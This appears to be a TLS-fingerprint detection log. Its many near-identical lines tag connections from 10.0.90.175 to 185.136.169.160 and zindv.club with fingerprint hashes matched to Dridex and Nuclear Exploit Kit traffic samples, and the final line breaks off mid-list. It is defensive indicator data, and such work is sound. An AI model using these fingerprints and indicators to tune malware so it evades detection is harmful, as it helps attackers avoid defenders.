10.0.90.175 49250 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49251 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49258 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49259 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49260 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49269 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49270 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49271 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49272 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49274 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49275 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49276 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49279 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49280 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49281 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49282 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49283 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49285 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49286 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49287 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49288 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49290 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49291 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49292 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49293 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49294 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49296 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49297 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49298 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49299 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49307 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49308 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49309 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49310 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49311 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49313 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49314 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49315 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49210 185.139.69.88 zindv.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49212 185.139.69.88 zindv.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, 